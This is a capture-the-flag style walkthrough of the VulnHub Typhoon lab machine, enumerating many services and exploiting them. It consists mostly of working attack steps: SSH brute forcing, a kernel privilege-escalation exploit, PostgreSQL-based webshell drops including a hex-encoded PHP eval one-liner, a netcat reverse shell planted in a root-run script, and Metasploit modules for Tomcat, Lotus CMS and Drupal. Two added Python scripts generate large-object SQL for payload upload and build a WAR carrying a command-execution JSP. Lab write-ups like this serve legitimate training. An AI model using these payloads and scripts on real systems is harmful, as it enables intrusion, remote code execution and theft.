Typhoon machine
For personal entertainment only
Machine info
Download: https://www.vulnhub.com/entry/typhoon-102,267/
1. Host discovery
arp-scan -l
![](https://upload-images.jianshu.io/upload_images/4664072-a78d3b650ec3fd07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
nmap -sV -p- -A 192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-aa54da95479fa315.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The scan shows that the target exposes many ports, including 21 (ftp), 22 (ssh), 25 (smtp), 53 (dns), 80 (http), ... 2049 (nfs_acl), 3306 (mysql), 5432 (postgresql), 6379 (redis), 8080 (http) and 27017 (mongodb).
2. Vulnerability scanning
Port 21 (ftp)
The nmap scan reports that anonymous login is allowed.
Opening ftp://192.168.181.136 in the browser shows nothing of interest.
![](https://upload-images.jianshu.io/upload_images/4664072-e54429b8d6d54c32.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 22 (ssh)
First thought: ssh needs a username and a password. Since the machine is called typhoon, the idea was to check whether an account with that name exists, using the OpenSSH username-enumeration weakness.
Port 22 is open and the banner says OpenSSH 6.6.1p1. The recently published OpenSSH username-enumeration CVE (CVE-2018-15473, which affects versions before 7.7) confirms which users exist on the host; only then is it worth brute-forcing passwords for those specific users (a budget of roughly 1000 attempts is reasonable). Use searchsploit to look up OpenSSH 6.6.1p1 first; it lists two username-enumeration exploits.
searchsploit openssh
![](https://upload-images.jianshu.io/upload_images/4664072-a2e3b52c2bf297d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Use msf for the account enumeration (auxiliary/scanner/ssh/ssh_enumusers). The username wordlist used here:
https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/wordlists-user-passwd/names/namelist.txt
![](https://upload-images.jianshu.io/upload_images/4664072-d06d699320d8a963.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set the options
![](https://upload-images.jianshu.io/upload_images/4664072-6e9d5ab9a97e24d1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Result
![](https://upload-images.jianshu.io/upload_images/4664072-d6cb97b32f0bd581.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The user exists, so the next step is to brute-force its password and see whether it is a weak one.
hydra -l typhoon -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-ad4f83493a3b31e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
username: typhoon
password: 789456123
Login test:
ssh typhoon@192.168.181.136
![](https://upload-images.jianshu.io/upload_images/4664072-2878152666212fde.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 25 (smtp)
Port 25 is open; the service is Postfix smtpd.
searchsploit postfix
![](https://upload-images.jianshu.io/upload_images/4664072-437c90c9fe78ada6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Enumerate usernames over SMTP (VRFY/EXPN) with msf's smtp_enum module (auxiliary/scanner/smtp/smtp_enum; the standalone smtp-user-enum tool does the same job). The index numbers printed by search depend on the msf version:
search smtp
use 5
![](https://upload-images.jianshu.io/upload_images/4664072-65fa1aac15f71da5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set the options
![](https://upload-images.jianshu.io/upload_images/4664072-25da31d59d16ee34.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 53 (DNS, ISC BIND 9.9.5-3)
Check whether this version has known issues: this BIND release has denial-of-service vulnerabilities.
searchsploit isc bind
![](https://upload-images.jianshu.io/upload_images/4664072-11e27f01162c3499.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 80 (http)
Open http://192.168.181.136:80
![](https://upload-images.jianshu.io/upload_images/4664072-63bb261f9984d525.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.181.136/robots.txt lists a /mongoadmin/ directory; open http://192.168.181.136/mongoadmin
![](https://upload-images.jianshu.io/upload_images/4664072-4df9cebe1f60c793.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7f2cc92fe95c9d47.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Two links appear below; clicking creds reveals a username and password, the same pair found by the ssh brute force.
![](https://upload-images.jianshu.io/upload_images/4664072-042a76200759fa07.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
username: typhoon
password: 789456123
Connect with ssh again
![](https://upload-images.jianshu.io/upload_images/4664072-9e23dae231b343fa.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Privilege escalation, method 1
searchsploit linux 3.13.0
![](https://upload-images.jianshu.io/upload_images/4664072-60cf083affae015f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Copy the exploit (37292.c, the overlayfs local privilege escalation for Ubuntu 14.04 kernels 3.13.0 to 3.19, CVE-2015-1328) to /opt:
cp /usr/share/exploitdb/exploits/linux/local/37292.c /opt
Start a small http server with python in the directory holding the exploit so the target can download it:
python -m SimpleHTTPServer 81
![](https://upload-images.jianshu.io/upload_images/4664072-6c97222f6ebaf87c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Move 37292.c to the desktop (the directory the http server is started from).
Use wget on the target to fetch the exploit from the Kali host into /tmp, which is world-writable and therefore a safe place to drop files (the server listens on port 81):
cd /tmp
wget http://192.168.181.128:81/37292.c
![](https://upload-images.jianshu.io/upload_images/4664072-1f2d0060cf17896f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Compile and run the exploit
![](https://upload-images.jianshu.io/upload_images/4664072-72c834f1aa3cffa8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
For a more usable shell, spawn a pty with python:
python -c 'import pty; pty.spawn("/bin/bash")'
flag:
Change to the root directory and read the flag.
![](https://upload-images.jianshu.io/upload_images/4664072-9dc29ab564791605.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Privilege escalation, method 2
The target is Ubuntu 14.04; search exploit-db for the kernel vulnerability and download it.
PoC: https://www.exploit-db.com/exploits/37292
![](https://upload-images.jianshu.io/upload_images/4664072-46d0eef37c644db6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f68827da03129ed3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The download is a .c file that has to be compiled; upload it to the target, then compile and run it there (the target has gcc installed).
Renamed to 123.c and placed in /root on Kali:
scp /root/123.c typhoon@192.168.181.136:/tmp
ls
gcc 123.c -o 123
ls
./123
Privilege escalation succeeded.
Port 111 (rpcbind, NFS)
List the exports with msf (auxiliary/scanner/nfs/nfsmount; showmount -e 192.168.181.136 does the same from the shell):
search nfs
use 1
![](https://upload-images.jianshu.io/upload_images/4664072-b5ed75a03b7a70f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set the options and view the result
![](https://upload-images.jianshu.io/upload_images/4664072-d1086a84e12381e1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 445 (smb)
Port 445 is open; use enum4linux to enumerate the shares:
enum4linux 192.168.181.136
The scan shows that a null session (empty username and password) is allowed and that there is a share named typhoon.
![](https://upload-images.jianshu.io/upload_images/4664072-fcc666455c451260.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-600a24a8ae4dc448.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Mount it remotely (any username with an empty password works for the null session):
mount -t cifs -o username='123',password='' //192.168.181.136/typhoon /mnt
cd /mnt
ls
![](https://upload-images.jianshu.io/upload_images/4664072-3f8f3ae8073fd026.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 5432 (PostgreSQL)
First test it with the msf login scanner:
search postgresql
use 5, or use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.181.136
exploit
![](https://upload-images.jianshu.io/upload_images/4664072-9bbfbfcd379a6d0e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Result
![](https://upload-images.jianshu.io/upload_images/4664072-586d152878cfb270.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The default credentials work:
username: postgres
password: postgres
Log in with psql:
psql -h 192.168.181.136 -U postgres
![](https://upload-images.jianshu.io/upload_images/4664072-bbfdd7b41122f426.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Reading files
pg_read_file reads files the postgres user is allowed to read; the call needs superuser rights and, on this version, the path is relative to the data directory:
select pg_read_file('postgresql.conf',0,1000);
![](https://upload-images.jianshu.io/upload_images/4664072-6ee721df8e70d8f8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Create a table and use COPY to load a file into it:
DROP TABLE IF EXISTS hua;            -- drop the table hua if it exists
CREATE TABLE hua(t TEXT);             -- create the table hua
COPY hua FROM '/etc/passwd';          -- load /etc/passwd into hua
SELECT * FROM hua LIMIT 1 OFFSET 0;   -- show the first row
![](https://upload-images.jianshu.io/upload_images/4664072-6db26b0c6fb517f9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dump all rows at once:
SELECT * FROM hua;
![](https://upload-images.jianshu.io/upload_images/4664072-b79bbd109a6ccd1b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Writing files from the database
INSERT INTO hua(t) VALUES ('hello,hua');   -- insert the string hello,hua
COPY hua(t) TO '/tmp/hua';                 -- write the column out to /tmp/hua
SELECT * FROM hua;                         -- check
![](https://upload-images.jianshu.io/upload_images/4664072-dff3aad649b87aee.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Dropping a webshell from the database
msf shell
Next, use the "large object" write method:
SELECT lo_create(6666);                       -- create the large object with OID 6666
DELETE FROM pg_largeobject WHERE loid=6666;   -- clear its contents
![](https://upload-images.jianshu.io/upload_images/4664072-521000ee5aac3a69.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Now write the data (the webshell) into the large object as hex.
First generate the shell:
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.181.128 lport=6666 R > /root/1.php
![](https://upload-images.jianshu.io/upload_images/4664072-2a9473bfcbe2181f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Open the generated 1.php and convert its contents to hex.
![](https://upload-images.jianshu.io/upload_images/4664072-05aed603a094ba02.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
insert into pg_largeobject (loid,pageno,data) values(6666, 0, decode('.....', 'hex'));
where ..... is the hex of the script file
![](https://upload-images.jianshu.io/upload_images/4664072-7ecc9c0ccdfebf2b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
This failed because the file was too large: pg_largeobject stores data in pages of 2048 bytes, so a payload longer than that has to be split across pageno 0, 1, 2 and so on instead of being inserted as one row.
Switched to a short hand-written reverse shell script instead, converted to hex:
![](https://upload-images.jianshu.io/upload_images/4664072-93660e7a273c45a5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Export the data to the target file:
SELECT lo_export(6666, '/var/www/html/shell.php');  -- a relative path is resolved against the data directory; with an absolute path the shell can be written anywhere the postgres OS user has write access
![](https://upload-images.jianshu.io/upload_images/4664072-1d6421e3a35cbb21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Then trigger it (start the msf listener first, then browse to http://192.168.181.136/shell.php):
msfconsole
search handler
use 26, or use exploit/multi/handler
![](https://upload-images.jianshu.io/upload_images/4664072-6b2b99555abc5d56.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
One-liner shell (Caidao)
Alternatively, hex-encode a PHP one-liner, <?php @eval($_POST['cmd']);?> :
3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E
Upload the shell:
insert into pg_largeobject (loid,pageno,data) values(6666, 0, decode('3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E', 'hex'));
Export the data to the target file:
SELECT lo_export(6666, '/var/www/html/1.php');
![](https://upload-images.jianshu.io/upload_images/4664072-6bae51360cd3d120.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
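The two large-object writes above (the msfvenom PHP payload that failed as a single INSERT, and the one-liner that fit) differ only in size. PostgreSQL stores large objects in pages of LOBLKSIZE = 2048 bytes and lo_export reads them page by page, so a longer payload must be split across consecutive pageno values. The helper below is an added example, not code from the original write-up: it takes any payload and emits the full SQL sequence (lo_create, clearing, one INSERT per page, lo_export). The OID 6666 and the export paths are the ones used on the page; the reassemble() function only mirrors what lo_export does, so the split can be verified locally without a database.

```python
"""Split a payload into pg_largeobject pages and emit the SQL that writes it out.

Added example; not from the original write-up. Assumes a PostgreSQL superuser
session (postgres/postgres on this box) and that the export directory is
writable by the postgres OS user.
"""

# Page size of pg_largeobject rows: LOBLKSIZE = BLCKSZ / 4 with the default 8 kB block.
LOBLKSIZE = 2048


def split_pages(payload: bytes) -> list[bytes]:
    """Cut payload into consecutive chunks of at most LOBLKSIZE bytes (one per pageno)."""
    return [payload[i:i + LOBLKSIZE] for i in range(0, len(payload), LOBLKSIZE)]


def reassemble(pages: list[bytes]) -> bytes:
    """What lo_export effectively does: concatenate the pages in pageno order."""
    return b"".join(pages)


def _sql_literal(s: str) -> str:
    """Escape a string for use inside a single-quoted SQL literal."""
    return s.replace("'", "''")


def lo_write_statements(payload: bytes, loid: int, export_path: str) -> list[str]:
    """Return, in order, the SQL statements that write payload to export_path via a large object."""
    stmts = [
        f"SELECT lo_create({loid});",
        f"DELETE FROM pg_largeobject WHERE loid = {loid};",
    ]
    # One row per page; pageno must be consecutive from 0 or lo_export stops early.
    for pageno, chunk in enumerate(split_pages(payload)):
        stmts.append(
            f"INSERT INTO pg_largeobject (loid, pageno, data) "
            f"VALUES ({loid}, {pageno}, decode('{chunk.hex()}', 'hex'));"
        )
    stmts.append(f"SELECT lo_export({loid}, '{_sql_literal(export_path)}');")
    return stmts


# The one-liner from the write-up; its hex is the string used on the page.
ONE_LINER = b"<?php @eval($_POST['cmd']);?>"

if __name__ == "__main__":
    # Constructed example: a payload of about 2.5 pages, so three INSERTs are needed.
    big = ONE_LINER * 180
    for stmt in lo_write_statements(big, 6666, "/var/www/html/shell.php"):
        print(stmt[:100] + ("..." if len(stmt) > 100 else ""))
```

Paste the printed statements into the psql session as they are; the hex in each INSERT is at most 4096 characters, which psql handles without trouble.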
Connect with Caidao
![](https://upload-images.jianshu.io/upload_images/4664072-96fb0606bb286371.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Port 6379 (redis)
Redis allows unauthenticated access; connect to it:
![](https://upload-images.jianshu.io/upload_images/4664072-6bbd28e594ac0434.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
There are three standard ways to exploit this:
1. write a webshell through redis
2. write an ssh public key to obtain root
3. write a crontab entry that spawns a reverse shell
None of them worked here: the Redis process does not have write access to the locations these techniques depend on (the web root, the .ssh directory and the cron spool), so the writes could not be turned into code execution.
Reference: Redis unauthenticated access, reproduction and exploitation
https://www.cnblogs.com/bmjoker/p/9548962.html
Port 8080 (Tomcat)
Open http://192.168.181.136:8080 in the browser
![](https://upload-images.jianshu.io/upload_images/4664072-8b2f7c6f9e8c739e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Login is required.
Test for valid credentials with msf (auxiliary/scanner/http/tomcat_mgr_login):
msfconsole
search tomcat
use 7
![](https://upload-images.jianshu.io/upload_images/4664072-95488348f3b8314d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Result
![](https://upload-images.jianshu.io/upload_images/4664072-e9a92bb4f32098e6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The credentials are:
username: tomcat
password: tomcat
![](https://upload-images.jianshu.io/upload_images/4664072-99c0f302dd1fa00b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Look for exploits
![](https://upload-images.jianshu.io/upload_images/4664072-b6d1a581e7bd623f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Use the manager upload exploit (exploit/multi/http/tomcat_mgr_upload):
search tomcat
use 16
Set the options
![](https://upload-images.jianshu.io/upload_images/4664072-97882ce551637bb3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Shell
python -c 'import pty;pty.spawn("/bin/bash")' for an interactive shell
![](https://upload-images.jianshu.io/upload_images/4664072-63d875cb0e3dfdfe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Finally, in the tab directory there is a .sh file that runs with elevated privileges, so the idea is to write commands into it and escalate again.
![](https://upload-images.jianshu.io/upload_images/4664072-cc1bd12d13de126d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Generate the bash payload with msfvenom:
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.181.128 lport=5555 R
![](https://upload-images.jianshu.io/upload_images/4664072-8030d27f2851e550.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Put the generated payload into script.sh (note that > replaces the whole script; use >> instead to append and keep its existing contents):
echo "mkfifo /tmp/qadshdh; nc 192.168.181.128 5555 0</tmp/qadshdh | /bin/sh >/tmp/qadshdh 2>&1; rm /tmp/qadshdh" > script.sh
![](https://upload-images.jianshu.io/upload_images/4664072-4ae14809a4497e91.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Start the listener before ./script.sh runs.
![](https://upload-images.jianshu.io/upload_images/4664072-2f65728b23505693.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
python -c 'import pty;pty.spawn("/bin/bash")' for an interactive shell
Getting a shell through the Tomcat manager
A quick search shows the default manager path is /manager/html; the credentials are tomcat / tomcat.
http://192.168.181.136:8080/manager/html
![](https://upload-images.jianshu.io/upload_images/4664072-b2fefbe0bdeb4731.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Generate a WAR with msfvenom:
msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.181.128 LPORT=4444 -f war -o evil.war
![](https://upload-images.jianshu.io/upload_images/4664072-55e6f70bd86cac5b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
The contents of evil.war:
7z l evil.war
![](https://upload-images.jianshu.io/upload_images/4664072-782c8e9ba6f9b71f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Upload the file through the manager.
To reach the malicious web application, enter the following in the browser's address bar (the WAR's base name becomes the context path):
http://192.168.181.136:8080/evil/tudvpurwgjh.jsp
http://192.168.181.136:8080/evil.war
A larger webshell packaged as a WAR can be uploaded the same way.
A local nc listener catches the reverse shell.
![](https://upload-images.jianshu.io/upload_images/4664072-874638338de4524a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
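The 7z listing above shows what the manager needs from a WAR: it is just a zip with WEB-INF/web.xml and a JSP, and the JSP is served at /<war base name>/<jsp name>. The script below is an added example, not the page's or msfvenom's code: it builds such an archive with a constructed command-runner JSP (the file name cmd.jsp is an assumption), lists it the way 7z l does, and computes the URL the deployed JSP answers on.

```python
"""Build a minimal Tomcat WAR carrying a JSP and list its contents.

Added example; not from the original write-up. The JSP is a small constructed
command runner used only to show what the archive must contain; msfvenom's
evil.war has the same layout (WEB-INF/web.xml plus a JSP with a random name).
"""
import io
import zipfile

# Minimal deployment descriptor; Tomcat serves a .jsp in the archive root without further mapping.
WEB_XML = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4">\n'
    '</web-app>\n'
)

# Constructed JSP: runs the command given in ?cmd=... and returns its stdout.
CMD_JSP = """<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(cmd);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) {
        out.println(line);
    }
}
%>
"""


def build_war(jsp_name: str, jsp_source: str = CMD_JSP) -> bytes:
    """Return the bytes of a WAR (a zip) containing WEB-INF/web.xml and one JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("WEB-INF/web.xml", WEB_XML)
        zf.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def list_war(war: bytes) -> list[str]:
    """Equivalent of `7z l evil.war`: the entry names inside the archive."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.namelist()


def read_entry(war: bytes, name: str) -> str:
    """Return one archive entry as text (used to verify the JSP survived packaging)."""
    with zipfile.ZipFile(io.BytesIO(war)) as zf:
        return zf.read(name).decode()


def deployed_url(base: str, war_filename: str, jsp_name: str) -> str:
    """Where Tomcat exposes the JSP: the WAR's base name becomes the context path."""
    context = war_filename[:-4] if war_filename.endswith(".war") else war_filename
    return f"{base}/{context}/{jsp_name}"


if __name__ == "__main__":
    war = build_war("cmd.jsp")
    with open("evil.war", "wb") as f:
        f.write(war)
    print(list_war(war))
    print(deployed_url("http://192.168.181.136:8080", "evil.war", "cmd.jsp"))
```

Upload evil.war through /manager/html as on the page, then request the printed URL with ?cmd=id; the response is the command output, running as the tomcat user.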
dirb scan
The dirb scan turns up cms, drupal, phpmyadmin and other directories.
![](https://upload-images.jianshu.io/upload_images/4664072-1c5cca1d17e4e188.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-893e1336c5ddf62b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Lotus CMS
Open the cms: http://192.168.181.136/cms
![](https://upload-images.jianshu.io/upload_images/4664072-d37b853c79a34e21.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Searching for this CMS's default credentials turned up something better: it is vulnerable to remote code execution through an eval() call.
Use msf's Lotus CMS module:
msfconsole
search lotus
use 9, or use exploit/multi/http/lcms_php_exec
![](https://upload-images.jianshu.io/upload_images/4664072-520033ec17e6b9c4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Set the options
![](https://upload-images.jianshu.io/upload_images/4664072-3b3a5c80ac0059e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Result
![](https://upload-images.jianshu.io/upload_images/4664072-073e5a09865a532b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Drupal CMS
Open drupal: http://192.168.181.136/drupal
![](https://upload-images.jianshu.io/upload_images/4664072-8283d7cb23a27a74.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Again use the msf Drupal module (Drupalgeddon 2, CVE-2018-7600):
search drupal
use 4, or use exploit/unix/webapp/drupal_drupalgeddon2
Set the options
![](https://upload-images.jianshu.io/upload_images/4664072-d97379c225990207.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Result
![](https://upload-images.jianshu.io/upload_images/4664072-6b73eeafbae395c7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Others
DVWA's config file contains the database credentials, which also work for phpMyAdmin:
username: root
password: toor
Log in at http://192.168.181.136/phpmyadmin
![](https://upload-images.jianshu.io/upload_images/4664072-b75efe273e68f440.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
Once inside, more credentials turn up; it turns out two web testing platforms were deployed on the target.